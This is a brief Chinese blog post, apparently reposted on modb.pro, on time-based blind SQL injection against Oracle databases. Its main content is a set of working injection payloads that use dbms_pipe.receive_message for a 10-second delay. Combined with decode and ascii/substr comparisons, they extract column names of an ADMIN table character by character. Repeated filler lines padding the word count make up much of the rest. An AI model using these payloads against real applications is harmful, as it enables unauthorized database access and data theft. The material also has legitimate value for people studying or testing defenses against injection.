Oracle延时注入

老徐今天也很棒 2021-06-28

2978

DBMS_PIPE.RECEIVE_MESSANG函数将从 RDS管道返回的数据等待10s。默认情况下，允许以public权限执行该包。

and 1=dbms_pipe.receive_message('RDS', 10)

延时注入可以直接通过 decode盲注进行使用

decode
and 1=(select decode(substr((select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),1,1),'U',dbms_pipe.receive_message('RDS', 10),0) from dual) --

ascii
and (select ascii(substr((select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),1,1)) from admin)=85 --

一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！

一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！

一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！

一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！

oracle

文章转载自老徐今天也很棒，如果涉嫌侵权，请发送邮件至：contact@modb.pro进行举报，并提供相关证据，一经查实，墨天轮将立刻删除相关内容。

​Oracle延时注入

评论

Oracle延时注入